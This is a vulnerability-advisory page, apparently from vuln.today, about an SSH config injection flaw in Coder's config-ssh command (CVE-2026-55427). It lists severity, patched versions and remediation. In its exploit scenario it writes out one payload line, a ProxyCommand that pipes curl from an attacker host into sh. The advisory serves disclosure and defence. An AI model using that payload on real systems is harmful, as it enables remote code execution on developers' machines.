Skip to main content

Coder CVE-2026-55427

HIGH
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)
2026-07-06 https://github.com/coder/coder GHSA-mcqq-fqgf-rxwm
8.3
CVSS 3.1 · Vendor: https://github.com/coder/coder
Share

Severity by source

Vendor (https://github.com/coder/coder) PRIMARY
8.3 HIGH
AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
vuln.today AI
8.3 HIGH

AC:H and UI:R capture the required privileged/MITM server position and the victim running config-ssh; S:C because injected directives affect all workstation SSH connections, yielding full C/I/A code execution.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (https://github.com/coder/coder).

CVSS VectorVendor: https://github.com/coder/coder

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jul 06, 2026 - 21:51 vuln.today

DescriptionCVE.org

Summary

coder config-ssh wrote server-supplied SSH settings (HostnameSuffix, SSHConfigOptions) into the user's ~/.ssh/config without sanitizing embedded newlines or restricting directives so a malicious or compromised Coder server could inject arbitrary SSH configuration.

> Note: Practical exploitation requires control of the server-supplied values through a malicious or compromised deployment, a man-in-the-middle position or admin access to the HostnameSuffix and SSHConfigOptions settings.

Impact

A server administrator or an attacker who controlled the server, could inject a directive such as ProxyCommand and achieve arbitrary code execution on any developer workstation that ran coder config-ssh. Injected commands ran with the local user's privileges and applied to all SSH connections, not just Coder workspaces.

Patches

The fix validates HostnameSuffix and SSHConfigOptions against a strict character set that rejects newlines and other control characters.

The fix was backported to all supported release lines:

Release linePatched version
2.34v2.34.2
2.33v2.33.8
2.32v2.32.7
2.29 (ESR)v2.29.17

Workarounds

Inspect coder config-ssh --dry-run output before applying changes.

Resources

  • Fix: #26154

Credits

Coder would like to thank Anthropic's Security Team (ANT-2026-22437) for independently disclosing this issue!

AnalysisAI

SSH configuration injection leading to arbitrary code execution in Coder's coder config-ssh CLI command allows a malicious or compromised Coder server to write attacker-controlled directives into a developer's ~/.ssh/config. The command copied server-supplied HostnameSuffix and SSHConfigOptions values verbatim without stripping newlines, letting an attacker in control of those values inject a directive such as ProxyCommand that runs on every SSH connection from the workstation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Control Coder server or MITM values
Delivery
Set malicious HostnameSuffix/SSHConfigOptions
Exploit
Developer runs coder config-ssh
Execution
Inject ProxyCommand into ~/.ssh/config
Persist
Developer opens SSH connection
Impact
Execute code as local user

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to control the server-supplied `HostnameSuffix` or `SSHConfigOptions` values, achieved through one of three concrete positions named in the advisory: (1) a malicious or attacker-operated Coder deployment, (2) a man-in-the-middle position on the client-to-server connection, or (3) administrative access to those two settings on a legitimate deployment. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score is 8.3 (High) with vector AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H - network vector, high attack complexity, no privileges required on the victim, but requiring user interaction (the developer must run `coder config-ssh`) and a scope change reflecting that injected config affects all SSH connections, not just Coder workspaces. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has compromised a Coder server, stood up a malicious deployment, or holds admin rights over the SSH-related deployment settings configures `SSHConfigOptions` (or `HostnameSuffix`) to contain an embedded newline followed by `ProxyCommand=/bin/sh -c 'curl attacker/x | sh'`. When a developer runs `coder config-ssh`, the payload is written into `~/.ssh/config` and executes with the developer's privileges on their next SSH connection - including connections unrelated to Coder. …
Remediation Vendor-released patch: upgrade to the fixed version for your release line - 2.34.2, 2.33.8, 2.32.7, or 2.29.17 (ESR) - per the release tags at https://github.com/coder/coder/releases and advisory GHSA-mcqq-fqgf-rxwm; these add strict character-set validation that rejects newlines/control characters in `HostnameSuffix` and `SSHConfigOptions`. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Coder server deployments to identify instances and verify current versions across supported release lines. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-55427 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy